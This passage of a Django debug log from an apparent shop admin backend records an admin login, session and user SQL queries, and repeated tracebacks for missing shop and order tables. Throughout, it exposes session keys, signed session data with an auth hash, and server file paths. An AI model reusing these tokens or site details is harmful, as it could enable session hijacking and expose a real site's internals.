tzinfo=)) DEBUG 2019-12-03 13:57:28,322 utils 7577 139709937760000 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'; args=('djxmmwyano011ratccnh8x0yfelj6wem',) DEBUG 2019-12-03 13:57:28,324 utils 7577 139709937760000 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('djxmmwyano011ratccnh8x0yfelj6wem'); args=('djxmmwyano011ratccnh8x0yfelj6wem',) DEBUG 2019-12-03 13:57:28,328 utils 7577 139709937760000 (0.003) UPDATE "auth_user" SET "last_login" = '2019-12-03T13:57:28.325286+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 3, 13, 57, 28, 325286, tzinfo=), 6) DEBUG 2019-12-03 13:57:28,332 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T13:57:28.330688+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 13, 57, 28, 330688, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [03/Dec/2019 13:57:28] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-03 13:57:28,626 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:28.615535+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 28, 615535, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:28,629 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:28,670 utils 7577 139709937760000 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 13:57:28,675 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T13:57:28.672739+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 13, 57, 28, 672739, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [03/Dec/2019 13:57:28] "GET / HTTP/1.0" 200 6019 [03/Dec/2019 13:57:29] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [03/Dec/2019 13:57:29] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [03/Dec/2019 13:57:29] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 DEBUG 2019-12-03 13:57:38,326 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:38.317415+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 38, 317415, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:38,329 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:38,332 utils 7577 139709937760000 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-03 13:57:38,364 utils 7577 139709937760000 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC, "shop_category"."id" DESC LIMIT 21; args=() DEBUG 2019-12-03 13:57:38,365 utils 7577 139709937760000 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC, "shop_category"."id" DESC LIMIT 21; args=() Internal Server Error: /shop/category/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_category" ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 606, in wrapper return self.admin_site.admin_view(view)(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/sites.py", line 223, in inner return view(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 45, in _wrapper return bound_method(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 1672, in changelist_view cl = self.get_changelist_instance(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 744, in get_changelist_instance sortable_by, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 82, in __init__ self.get_results(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 210, in get_results result_count = paginator.count File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/paginator.py", line 91, in count return c() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 392, in count return self.query.get_count(using=self.db) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 504, in get_count number = obj.get_aggregation(using, ['__count'])['__count'] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 489, in get_aggregation result = compiler.execute_sql(SINGLE) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_category" ^ [03/Dec/2019 13:57:38] "GET /shop/category/ HTTP/1.0" 500 174486 DEBUG 2019-12-03 13:57:44,617 utils 7577 139709937760000 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:44.605960+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 44, 605960, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:44,621 utils 7577 139709937760000 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:44,671 utils 7577 139709937760000 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 13:57:44,676 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T13:57:44.674139+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 13, 57, 44, 674139, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [03/Dec/2019 13:57:44] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-03 13:57:47,045 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:47.036581+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 47, 36581, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:47,048 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:47,051 utils 7577 139709937760000 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-03 13:57:47,079 utils 7577 139709937760000 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC LIMIT 21; args=() DEBUG 2019-12-03 13:57:47,081 utils 7577 139709937760000 (0.000) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC LIMIT 21; args=() Internal Server Error: /shop/product/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_product" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_product" ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 606, in wrapper return self.admin_site.admin_view(view)(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/sites.py", line 223, in inner return view(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 45, in _wrapper return bound_method(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 1672, in changelist_view cl = self.get_changelist_instance(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 744, in get_changelist_instance sortable_by, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 82, in __init__ self.get_results(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 210, in get_results result_count = paginator.count File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/paginator.py", line 91, in count return c() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 392, in count return self.query.get_count(using=self.db) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 504, in get_count number = obj.get_aggregation(using, ['__count'])['__count'] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 489, in get_aggregation result = compiler.execute_sql(SINGLE) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_product" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_product" ^ [03/Dec/2019 13:57:47] "GET /shop/product/ HTTP/1.0" 500 174925 DEBUG 2019-12-03 13:57:50,325 utils 7577 139709937760000 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:50.313629+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 50, 313629, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:50,328 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:50,369 utils 7577 139709937760000 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-03 13:57:50,373 utils 7577 139709937760000 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-17T13:57:50.371396+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 17, 13, 57, 50, 371396, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [03/Dec/2019 13:57:50] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-03 13:57:52,131 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:52.122871+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 3, 13, 57, 52, 122871, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-03 13:57:52,134 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-03 13:57:52,137 utils 7577 139709937760000 (0.000) SELECT COUNT(*) AS "__count" FROM "orders_order"; args=() DEBUG 2019-12-03 13:57:52,175 utils 7577 139709937760000 (0.001) SELECT "orders_order"."id", "orders_order"."first_name", "orders_order"."last_name", "orders_order"."email", "orders_order"."address", "orders_order"."postal_code", "orders_order"."city", "orders_order"."created", "orders_order"."updated", "orders_order"."paid" FROM "orders_order" ORDER BY "orders_order"."created" DESC, "orders_order"."id" DESC LIMIT 21; args=() DEBUG 2019-12-03 13:57:52,177 utils 7577 139709937760000 (0.000) SELECT "orders_order"."id", "orders_order"."first_name", "orders_order"."last_name", "orders_order"."email", "orders_order"."address", "orders_order"."postal_code", "orders_order"."city", "orders_order"."created", "orders_order"."updated", "orders_order"."paid" FROM "orders_order" ORDER BY "orders_order"."created" DESC, "orders_order"."id" DESC LIMIT 21; args=() Internal Server Error: /orders/order/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "orders_order" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "orders_order" ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 606, in wrapper return self.admin_site.admin_view(view)(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/sites.py", line 223, in inner return view(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 45, in _wrapper return bound_method(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 1672, in changelist_view cl = self.get_changelist_instance(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 744, in get_changelist_instance sortable_by, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 82, in __init__ self.get_results(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 210, in get_results result_count = paginator.count File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/paginator.py", line 91, in count return c() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 392, in count return self.query.get_count(using=self.db) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 504, in get_count number = obj.get_aggregation(using, ['__count'])['__count'] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 489, in get_aggregation result = 